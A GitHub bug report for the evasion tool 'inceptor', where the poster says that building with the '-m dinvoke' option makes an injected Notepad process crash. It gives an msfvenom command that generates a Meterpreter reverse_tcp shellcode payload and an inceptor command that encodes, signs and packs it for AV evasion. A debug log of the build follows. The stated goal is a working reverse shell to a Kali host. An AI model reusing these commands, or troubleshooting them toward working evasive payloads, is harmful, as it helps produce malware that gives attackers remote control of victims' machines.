
use -m dinvoke cause notepad injection address conflicts #46

Open
d0l1u opened this issue May 30, 2023 · 0 comments

d0l1u commented May 30, 2023

Describe the bug
I use the command containing "-m dinvoke" to compile the packaged exe, which causes Notepad injection exceptions.

To Reproduce
My OS is Windows 10 and my VS version is VS2022.
I use msfvenom to create the raw payload in Kali, with the command below:
msfvenom --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=kali ip LPORT=4444 -f raw > a4.raw
The inceptor bypass command is "python inceptor.py donet a4.raw -o demo\xx.exe --sgn --sign -P -m dinvoke --delay 15".
I use the command "demo.bat xx.exe", and the injection victim Notepad exits abnormally.
But if I remove the option -m dinvoke, then the final compiled exe can make a reverse connection to Kali successfully.
Or if I remove the option -P, then the final compiled exe can also make a reverse connection to Kali successfully.

Expected behavior
Run "demo.bat xx.exe" and the final compiled payload can make a reverse connection to Kali.

Screenshots
If applicable, add screenshots to help explain your problem.

image

Debug Info:

  1. Go to your config.ini file
  2. In DEBUG, mark all as 1
  3. Reproduce the bug again
  4. Paste the output given by the tool
▒ by d3adc0de (@klezVirus)
--------------------------------------------------------------------------------------

[DEBUG] Loading module Dinvoke
[DEBUG] Loading module Delay
[+] .Net Artifact Generator Started At 2023-05-29 13:11:56.792864
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
  [>] Transformer: Loader
[*] Phase 2: Encoding
  [>] Phase 2.1: Using Shikata-Ga-Nai x64 to encode the shellcode
    [*] Encoded filename: C:\Users\ll\inceptor\inceptor\temp\tmpjl1x2_0v.raw.sgn
  [>] Phase 2.2: Using Inceptor chained encoder to encode the shellcode
  [>] Encoder Chain: HexEncoder
  [>] Shellcode size: 1228
  [>] Shellcode Signature: 4cd095380d1813a5d7ce12309e1b7f282cb629cb
[*] Phase 3: Generating source files using CLASSIC-DINVOKE_MANUAL_MAPPING
  [>] Phase 3.1: Writing CS file in .\temp\tmpxm7yrsms.cs
  [>] Phase 3.2: Compiling and linking dependency files in "DInvoke.dll"
[*] Phase 4: Compiling
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"  /target:exe /platform:x64 /unsafe /out:"C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe" /res:"C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll" /r:"C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll"  "C:\Users\ll\inceptor\inceptor\temp\tmpxm7yrsms.cs"
Microsoft (R) Visual C# Compiler version 4.8.3752.0
for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.

This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240

[*] Phase 5: Merging Resources
"C:\Users\ll\inceptor\inceptor\libs\public\ILRepack.exe"  /target:exe /out:"C:\Users\ll\inceptor\inceptor\temp\xx-packed.exe"  "C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe" "C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll"
INFO: IL Repack - Version 2.0.18
INFO: ------------- IL Repack Arguments -------------
/out:C:\Users\ll\inceptor\inceptor\temp\xx-packed.exe  C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll
-----------------------------------------------
INFO: Adding assembly for merge: C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe
INFO: Adding assembly for merge: C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll
INFO: Processing references
INFO: Processing types
INFO: Merging <Module>
INFO: Merging <Module>
INFO: Processing exported types
INFO: Processing resources
INFO: Fixing references
INFO: Writing output assembly to disk
INFO: Finished in 00:00:00.6446447

  [+] Success: packed file stored at C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe
  [+] File Signature: cadf3da2d2cc537444b9b57d5081116a2981d290
[*] Phase 6: Sign dotnet binary
'"C:\Users\ll\inceptor\inceptor"' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
  [+] Signed with: CarbonCopy
[*] Phase 7: Finalising
  [+] Success: file stored at demo\xx.exe
[*] Phase 8: Cleaning up
[+] .Net Artifact Generator Finished At 2023-05-29 13:12:00.463994

Additional context
Add any other context about the problem here.

@d0l1u d0l1u changed the title use -m dinvoke cause injection address conflicts use -m dinvoke cause notepad injection address conflicts May 30, 2023